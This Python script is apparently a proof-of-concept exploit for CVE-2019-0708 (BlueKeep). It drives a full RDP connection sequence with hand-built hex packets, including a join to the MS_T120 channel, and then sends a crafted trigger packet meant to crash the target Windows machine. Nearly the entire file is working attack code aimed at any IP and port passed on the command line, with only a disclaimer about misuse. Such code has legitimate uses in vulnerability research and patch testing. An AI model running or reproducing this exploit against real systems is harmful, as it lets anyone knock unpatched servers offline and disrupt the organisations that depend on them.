poc.py

#!/usr/bin/env python3

"""
CVE-2019-0708: BSOD Proof of Concept

# Author: pywchung
# Time: 2021/06/20

# References

- RDP Connection Sequence
https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/b61e1c76-5d7c-4285-b61a-b69f85e4a0e2

- Annotated Connection Sequence Example
https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/87b479dd-c2df-4d84-aafd-dac518dd8c8e
"""

import sys, socket
from OpenSSL import *

### Connection Initiation Start ---------------------------------------------------------------------------------------
def X_224_Connection_Request_PDU(s):
    buf = "03000013"  # tpktHeader, 0x13 = 19 bytes
    buf += "0ee0"  # x224Data start, 0x0e = 14 bytes
    buf += "0000"  # DST-REF
    buf += "0000"  # SRC-REF
    buf += "00"  # Class and Options
    # No routingToken or cookie
    buf += "01"  # rdpNegReq start
    buf += "00"  # flag
    buf += "0800"  # length = 8 bytes
    buf += "01000000"  # requestedProtocols

    packed = bytes.fromhex(buf)
    s.sendall(packed)

    pkt = s.recv(8192)
    print("[+]", len(pkt), "bytes received")

    if pkt is None:
        print("[-] No response received, terminating session...")
        sys.exit()
    else:
        print("[+] RDP is being used, connection initiated")

    ctx = SSL.Context(SSL.TLSv1_METHOD)
    tls = SSL.Connection(ctx, s)
    tls.set_connect_state()
    tls.do_handshake()

    return tls
### Connection Initiation End -----------------------------------------------------------------------------------------

### Basic Settings Exchange Start -------------------------------------------------------------------------------------
def MCS_Connect_Initial_PDU(tls):
    buf = "030001a0"  # tpktHeader, 0x1a0 = 416 bytes
    buf += "02f080"  # x224Data

    # mcsCi start
    buf += "7f65"  # APPLICATION 101 = Connect-Initial
    buf += "820194"  # BER: Type Length = 404 bytes (0x194)

    # Connect-Initial start
    buf += "040101"  # Calling Domain Selector
    buf += "040101"  # Called Domain Selector
    buf += "0101ff"  # Upward Flag = TRUE

    # Target Domain Parameters
    buf += "3019"  # 0x19 = 25 bytes
    buf += "020122"  # maxChannelIds = 34
    buf += "020102"  # maxUserIds = 2
    buf += "020100"  # maxTokenIds = 0
    buf += "020101"  # numPriorities = 1
    buf += "020100"  # minThroughput = 0
    buf += "020101"  # maxHeight = 1
    buf += "0202ffff"  # maxMCSPDUsize = 65535
    buf += "020102"  # protocolVersion = 2

    # Minimmum Domain Parameters
    buf += "3019"  # 0x19 = 25 bytes
    buf += "020101"  # maxChannelIds = 1
    buf += "020101"  # maxUserIds = 1
    buf += "020101"  # maxTokenIds = 1
    buf += "020101"  # numPriorities = 1
    buf += "020100"  # minThroughput = 0
    buf += "020101"  # maxHeight = 1
    buf += "02020420"  # maxMCSPDUsize = 1056
    buf += "020102"  # protocolVersion = 2

    # Maximum Domain Parameters
    buf += "301c"  # 0x1c = 28 bytes
    buf += "0202ffff"  # maxChannelIds = 65535
    buf += "0202fc17"  # maxUserIds = 64535
    buf += "0202ffff"  # maxTokenIds = 65535
    buf += "020101"  # numPriorities = 1
    buf += "020100"  # minThroughput = 0
    buf += "020101"  # maxHeight = 1
    buf += "0202ffff"  # maxMCSPDUsize = 65535
    buf += "020102"  # protocolVersion = 2
    # mcsCi end

    # gccCCrq start
    buf += "04820133"  # User Data = 307 bytes (0x133)

    # GCC Connection Data
    buf += "00"  # padding
    buf += "05"  # object length = 5 bytes
    buf += "00147c0001"  # object
    buf += "812a"  # connectPDU length = 298 bytes (0x12a)
    # GCC Conference Create Request PDU (PER encoded) = 284 bytes (0x11c)
    buf += "000800100001c00044756361811c"
    # gccCCrq end

    # clientCoreData start (Little endian)
    buf += "01c0d800"  # length = 216 bytes (0x00d8)
    buf += "04000800"  # version
    buf += "0005"  # desktopWidth = 1280
    buf += "0004"  # desktopHegith = 1024
    buf += "01ca"  # colorDepth (0xca01)
    buf += "03aa"  # SASSequence
    buf += "09040000"  # keyboardLayout = 1033 (0x409, US English)
    buf += "ce0e0000"  # clientBuild = 3790 (0x0ece)

    # clientName = "ELTONS-TEST2"
    buf += "45004c0054004f004e0053002d00440045005600320000000000000000000000"

    buf += "04000000"  # keyboardType
    buf += "00000000"  # keyboardSubType
    buf += "0c000000"  # keyboardFunctionKey

    # imeFileName = ""
    buf += "00000000000000000000000000000000"
    buf += "00000000000000000000000000000000"
    buf += "00000000000000000000000000000000"
    buf += "00000000000000000000000000000000"

    buf += "01ca"  # postBeta2ColorDepth = RNS_UD_COLOR_8BPP (0xca01)
    buf += "0100"  # clientProductId
    buf += "00000000"  # serialNumber
    buf += "1800"  # highColorDepth = 24 bit (0x18)
    buf += "0700"  # supportedColorDepths
    # earlyCapabilityFlags = RNS_UD_CS_SUPPORT_ERRINFO_PDU (0x01)
    buf += "0100"

    # clientDigProductId = "69712-783-0357974-42714"
    buf += "360039003700310032002d0037003800"
    buf += "33002d00300033003500370039003700"
    buf += "34002d00340032003700310034000000"
    buf += "00000000000000000000000000000000"

    buf += "00"  # connectionType = 0
    buf += "00"  # pad1octet
    buf += "00000000"  # serverSelectedProtocol
    # clientCoreData end

    # clusterData
    buf += "04c00c00"
    buf += "0d000000"
    buf += "00000000"

    # clientSecurityData start (little endian)
    buf += "02c00c00"  # length = 12 bytes (0x0c)
    buf += "1b000000"  # encryptionMethods
    buf += "00000000"  # extEncryptionMethods
    # clientSecurityData End

    # clientNetworkData start (little endian)
    buf += "03c02c00"  # length = 44 bytes (0x2c)
    buf += "03000000"  # channelCount = 3

    # Channel 1
    buf += "7264706472000000"  # name = rdprdr
    buf += "00008080"  # options

    # Channel 2
    buf += "636c697072647200"  # name = cliprdr
    buf += "0000a0c0"  # options

    # Channel 3
    buf += "4d535f5431323000"  # name = MS_T120
    buf += "00000000"  # options
    # clientNetworkData end

    #packed = bytes.fromhex(buf)
    packed = bytes.fromhex("030001ee02f0807f658201e20401010401010101ff30190201220201020201000201010201000201010202ffff020102301902010102010102010102010102010002010102020420020102301c0202ffff0202fc170202ffff0201010201000201010202ffff02010204820181000500147c00018178000800100001c00044756361816a01c0ea000a0008008007380401ca03aa09040000b11d00004400450053004b0054004f0050002d004600380034003000470049004b00000004000000000000000c0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001ca01000000000018000f00af07620063003700380065006600360033002d0039006400330033002d003400310039380038002d0039003200630066002d0000310062003200640061004242424207000100000056020000500100000000640000006400000004c00c00150000000000000002c00c001b0000000000000003c0680005000000726470736e6400000f0000c0636c6970726472000000a0c0647264796e766300000080c04d535f5431323000000000004d535f5431323000000000004d535f5431323000000000004d535f5431323000000000004d535f543132300000000000")
    tls.sendall(packed)

    pkt = tls.recv(8192)
    print("[+]", len(pkt), "bytes received")
### Basic Settings Exchange End ---------------------------------------------------------------------------------------

### Channel Connection Start ------------------------------------------------------------------------------------------
def MCS_Erect_Domain_Request_PDU(tls):
    buf = "0300000c"  # tpktHeader, 0x0c = 12 bytes
    buf += "02f080"  # x224Data
    buf += "0401000100"  # mcsEDr1

    packed = bytes.fromhex(buf)
    tls.sendall(packed)


def MCS_Attach_User_Request_PDU(tls):
    buf = "03000008"  # tpktHeader, 0x08 = 8 bytes
    buf += "02f080"  # x224Data
    buf += "28"  # mcsAUrq

    packed = bytes.fromhex(buf)
    tls.sendall(packed)

    pkt = tls.recv(8192)
    print("[+]", len(pkt), "bytes received")


def MCS_Channel_Join_Request_PDU(tls):
    buf = "0300000c"  # tpktHeader, 0x0c = 12 bytes
    buf += "02f080"  # x224Data
    # mcsCJrq
    buf += "38"  # channelJoinRequest
    buf += "0008"  # initiator (1001 + 8)
    buf += "03eb"  # channelId (1003, may be available 1003 - 1009)

    packed = bytes.fromhex(buf)
    print("[*] Requesting Channel 1003...")
    tls.sendall(packed)

    pkt = tls.recv(8192)
    print("[+]", len(pkt), "bytes received")
### Channel Connection End --------------------------------------------------------------------------------------------

# Optional Security Exchange PDU omitted

### Secure Settings Exchange Start ------------------------------------------------------------------------------------
def Client_Info_PDU(tls):
    buf = "030001a3"  # tpktHeader, 0x1a3 = 419 bytes
    buf += "02f080"  # x224Data

    # mcsSDrq
    buf += "64000703eb708194"  # 0x194 = 404 bytes
    
    # clientInfoPduData ... (little endian)
    buf += "4000"  # Security Header, 0x0040 = SEC_INFO_PKT (YES) / 0x0008 = SEC_ENCRYPT (NO)
    buf += "a1a5"  # flagsHigh
    # buf += "45ca46fa5ea7bebc"
    buf += "09040904"  # CodePage 0x0409 = 1033 = English(US)
    buf += "b3430000"  # flags
    buf += "0a00"  # cbDomain = 0xa bytes
    buf += "0c00"  # cbUserName
    buf += "0000"  # cbPassword
    buf += "0000"  # cbAlternateShell
    buf += "0000"  # cbWorkingDir

    buf += "4e0054004400450056000000"  # Domain: "NTDEV"
    buf += "65006c0074006f006e0073000000"  # UserName = "eltons"
    buf += "0000"  # Password = ""
    buf += "0000"  # AlternateShell = ""
    buf += "0000"  # WorkingDir = ""

    # extendedClientPduData ... (little endian)
    buf += "0200"  # clientAddressFamily = AF_INET (2)
    buf += "1e00"  # cbClientAddress = 30 bytes (0x1e)
    buf += "3100350037002e00350039002e003200340032002e003100350036000000"  # clientAddress = "157.59.242.156"
    buf += "8400"  # cbClientDir = 132 bytes (0x84)
    # clientDir = "C:\depots\w2k3_1\termsrv\newclient\lib\win32\obj\i386\mstscax.dll"
    buf += "43003a005c006400650070006f00740073005c00770032006b0033005f003100"
    buf += "5c007400650072006d007300720076005c006e006500770063006c0069006500"
    buf += "6e0074005c006c00690062005c00770069006e00330032005c006f0062006a00"
    buf += "5c0069003300380036005c006d007300740073006300610078002e0064006c006c000000"

    # timeZoneInfo ... (little endian)
    buf += "e0010000"  # bias = 480 mins
    # standardName = "Pacific Standard Time"
    buf += "500061006300690066006900630020005300740061006e006400610072006400"
    buf += "2000540069006d00650000000000000000000000000000000000000000000000"
    buf += "0000"  # wYear = 0
    buf += "0a00"  # wMonth = 10
    buf += "0000"  # wDayOfWeek = 0 (Sunday)
    buf += "0500"  # wDay = 5 (last Sunday)
    buf += "0200"  # wHour = 2am
    buf += "0000"  # wMinute = 0
    buf += "0000"  # wSecond = 0
    buf += "0000"  # wMillisecond = 0

    # daylightTimeZoneInfo ... (little endian)
    buf += "00000000"  # standardBias = 0
    # daylightName = "Pacific Daylight Time"
    buf += "500061006300690066006900630020004400610079006c006900670068007400"
    buf += "2000540069006d00650000000000000000000000000000000000000000000000"
    buf += "0000"  # wYear = 0
    buf += "0400"  # wMonth = 4
    buf += "0000"  # wDayOfWeek = 0 (Sunday)
    buf += "0100"  # wDay = 1 (first Sunday)
    buf += "0200"  # wHour = 2am
    buf += "0000"  # wMinute = 0
    buf += "0000"  # wSecond = 0
    buf += "0000"  # wMillisecond = 0
    buf += "c4ffffff"  # daylightBias = 0xffffffc4 (-60)
    
    buf += "00000000"  # clientSessionId = 0
    buf += "01000000"  # performanceFlags = 0x01 (Disable Wallpaper)
    buf += "0000"  # cbAutoReconnectCookie = 0

    packed = bytes.fromhex(buf)
    tls.sendall(packed)

    pkt = tls.recv(8192)
    print("[+]", len(pkt), "bytes received")
    pkt = tls.recv(8192)
    print("[+]", len(pkt), "bytes received")
### Secure Settings Exchange End --------------------------------------------------------------------------------------

# Optional Exchanges Ommitted

### Capabilities Exchange Start ---------------------------------------------------------------------------------------
def Confirm_Active_PDU(tls):
    buf = "030001fb"  # tpktHeader, 0x1fb = 507 bytes
    buf += "02f080"  # x224Data
    buf += "64000703eb7081ec"  # mcsSDrq - 0x1ec = 492 bytes
    # optional securityHeader omitted
    buf += "ec01"  # 0x1ec = 492 bytes
    buf += "1300"
    buf += "ef03"
    buf += "ea030100"
    buf += "ea03"
    buf += "0600"
    buf += "d601"
    buf += "4d5354534300"
    buf += "1200"
    buf += "0000"
    buf += "01001800010003000002000000001d040000000000000000"  # General Capability Set (24 bytes)
    buf += "02001c00180001000100010000050004000001000100000001000000"  # Bitmap Capability Set (28 bytes)
    
    # Order Capability Set (88 bytes)
    buf += "0300580000000000000000000000000000000000000000000100140000000100"
    buf += "00002a0001010101010000010101000100000001010101010101010001010100"
    buf += "00000000a1060000000000000084030000000000e4040000"
    
    # Bitmap Cache 2 Rev. 2 Capability Set (40 bytes)
    buf += "13002800030000037800000078000000fb0900800000000000000000000000000000000000000000"
    
    buf += "0a00080006000000"  # Color Table Cache Capability Set (8 bytes)
    buf += "07000c000000000000000000"  # Windows Activation Capability Set (12 bytes)
    buf += "05000c000000000002000200"  # Control Capability Set (12 bytes)
    buf += "08000a00010014001500"  # Pointer Capability Set (10 bytes)
    buf += "0900080000000000"  # Share Capability Set (8 bytes)
    
    # Input Capability Set (88 bytes)
    buf += "0d005800150020000904000004000000000000000c0000000000000000000000"
    buf += "0000000000000000000000000000000000000000000000000000000000000000"
    buf += "000000000000000000000000000000000000000000000000"

    buf += "0c00080001000000"  # Sound Capability Set (8 bytes)    
    buf += "0c00080001000000"  # Font Capability Set (8 bytes)
    
    # Glyph Cache Capability Set (52 bytes)
    buf += "10003400fe000400fe000400fe000800fe000800fe001000fe002000fe004000"
    buf += "fe008000fe000001400000080001000103000000"

    buf += "0f00080001000000"  # Brush Capability Set (8 bytes)
    buf += "11000c0001000000001e6400"  # Offscreen Bitmap Cache Capability (12 bytes)
    buf += "1400080001000000"  # Virtual Channel Capability Set (8 bytes)
    buf += "15000c0002000000000a0001"  # DrawNineGridCache (12 bytes)
    
    # DrawGdiPlus Capability Set (40 bytes)
    buf += "16002800000000000000000000000000000000000000000000000000000000000000000000000000"

    packed = bytes.fromhex(buf)
    tls.sendall(packed)
### Capabilities Exchange End -----------------------------------------------------------------------------------------

### Connection Finalization Start -------------------------------------------------------------------------------------
def Synchronize_PDU(tls):
    buf = "03000024"  # tpktHeader, 0x28 = 40 bytes
    buf += "02f080"  # x224Data
    buf += "64000703eb7016"  # mcsSDrq - 0x1a = 26 bytes
    # optional securityHeader omitted
    buf += "16001700ef03ea030100000108001f0000000100ea03"  # synchronizePduData

    packed = bytes.fromhex(buf)
    tls.sendall(packed)


def Control_PDU_Cooperate(tls):
    buf = "03000028"  # tpktHeader, 0x2c = 44 bytes
    buf += "02f080"
    buf += "64000703eb701a"  # mcsSDrq - 0x1e = 30 bytes
    # optional securityHeader omitted
    buf += "1a001700ef03ea03010000010c00140000000400000000000000"  # controlPduData

    packed = bytes.fromhex(buf)
    tls.sendall(packed)


def Control_PDU_Request_Control(tls):
    buf = "03000028"  # tpktHeader, 0x2c = 44 bytes
    buf += "02f080"
    buf += "64000703eb701a"  # mcsSDrq - 0x1e = 30 bytes
    # optional securityHeader omitted
    buf += "1a001700ef03ea03010000010c00140000000100000000000000"  # controlPduData

    packed = bytes.fromhex(buf)
    tls.sendall(packed)


def Persistent_Key_List_PDU(tls):
    buf = "03000101"  # tpktHeader, 0x101 = 257 bytes
    buf += "02f080"  # x224Data
    buf += "64000703eb7080f2"  # mcsSDrq - 0xf2 = 242 bytes
    # optional securityHeader omitted

    # TS_SHARECONTROLHEADER
    buf += "f200"  # 0xf2 = 242 bytes
    buf += "1700ef03ea030100000100002b000000"

    # TS_BITMAPCACHE_PERSISTENT_LIST_PDU
    buf += "00000000190000000000"
    buf += "00000000190000000000"  
    buf += "03000000"
    
    # TS_BITMAPCACHE_PERSISTENT_LIST_ENTRY
    buf += "a31e51164829227861f7899ccda966a8444eb7bdb46d9ef6399164afbcc370029faafafd"
    buf += "6eba58dc7bafde06563ac2ce68ba54b6bf9ebcd6d122c09863e941fe386c50350edbb3f5"
    buf += "45cc182d3044fc88e5c35d2363f6cf530aa801b61051a52870816c59192900c9e2b5e7a7"
    buf += "46044e1b728d4add81bb1416536a4e3c487266c96c774b4a32482cc6025456f281c98556"
    buf += "2c0a3d54869d2b97630f0a36f863793ec970414beca87c7b7928b6b4a64324decb9cffa2"
    buf += "293c025664df80b00d6ee71a83c75431aa8a90b3"

    packed = bytes.fromhex(buf)
    tls.sendall(packed)


def Font_List_PDU(tls):
    buf = "03000028"  # tpktHeader, 0x2c = 44 bytes
    buf += "02f080"  # x224Data
    buf += "64000703eb701a"  # mcsSDrq - 0x1e = 30 bytes
    # optional securityHeader omitted
    buf += "1a001700ef03ea03010000013bda270000000000000003003200"  # fontListPduData

    packed = bytes.fromhex(buf)
    tls.sendall(packed)
### Connection Finalization End ---------------------------------------------------------------------------------------

### Exploit Start -----------------------------------------------------------------------------------------------------
def trigger(tls):
    buf = "0300002e"  # tpktHeader, 0x2e = 46 bytes
    buf += "02f080"  # x224Data
    buf += "64000703ef7014"  # mcsSDrq - 0x14 = 20 bytes
    # optional securityHeader omitted
    buf += "0c0000000300000000000000020000000000000000000000"

    packed = bytes.fromhex(buf)
    tls.sendall(packed)
### Exploit End -------------------------------------------------------------------------------------------------------

### Disconnection Sequence Start --------------------------------------------------------------------------------------
def MCS_Disconnect_Provider_Ultimatum_PDU(tls):
    buf = "03000009"  # tpktHeader, 0x09 = 9 bytes
    buf += "02f080"  # x224Data
    buf += "2180"
    packed = bytes.fromhex(buf)

    tls.sendall(packed)
### Disconnection Sequence End ----------------------------------------------------------------------------------------

### Common Method -----------------------------------------------------------------------------------------------------
def main(address, port=3389):
    print("\n==========CVE-2019-0708 PoC==========")
    print("[*] Author: pywchung")
    print("[*] The author is not responsible for any misuse of this script.")
    print("[*] Use at your own risk!")
    print("=====================================\n")

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    # X.224 Connection Request PDU
    print("[*] Checking if RDP is running on", address, ":", port, "...")
    
    try:
        s.connect((address, port))
        print("[*] Sending X.224 Connection Request PDU...")
        tls = X_224_Connection_Request_PDU(s)
    except ConnectionRefusedError:
        print("[-] Connection refused, terminating session...")
        sys.exit()
    except KeyboardInterrupt:
        print("[-] Keyboard interrupted, terminating session...")
        sys.exit()
    except:
        print("[-] An unknown error occured, terminating session...")
        sys.exit()

    print("[*] Sending MCS Connect-Initial PDU with GCC...")
    MCS_Connect_Initial_PDU(tls)

    print("[*] Sending MCS Erect Domain Request PDU...")
    MCS_Erect_Domain_Request_PDU(tls)

    print("[*] Sending MCS Attach User Request PDU...")
    MCS_Attach_User_Request_PDU(tls)

    print("[*] Sending MCS Channel Join Request PDU...")
    MCS_Channel_Join_Request_PDU(tls)

    print("[*] Sending Client Info PDU...")
    Client_Info_PDU(tls)

    print("[*] Sending Confirm Active PDU...")
    Confirm_Active_PDU(tls)
    
    print("[*] Sending Synchronize PDU...")
    Synchronize_PDU(tls)

    print("[*] Sending Control PDU - Cooperate...")
    Control_PDU_Cooperate(tls)

    print("[*] Sending Control PDU - Request Control...")
    Control_PDU_Request_Control(tls)

    print("[*] Sending Persistent Key List PDU(s)...")
    Persistent_Key_List_PDU(tls)

    print("[*] Sending Font List PDU...")
    Font_List_PDU(tls)

    print("[*] Triggering vulnerability...")
    trigger(tls)

    print("[*] Sending disconnection request...")
    MCS_Disconnect_Provider_Ultimatum_PDU(tls)

    print("[*] Process finished, good bye!")
    sys.exit()


if __name__ == "__main__":
    if len(sys.argv) == 2:
        main(sys.argv[1])
        sys.exit()
    elif len(sys.argv) == 3:
        main(sys.argv[1], (int)(sys.argv[2]))
        sys.exit()
    else:
        print("[*] Usage: python3 poc.py IP PORT (no port = 3389)")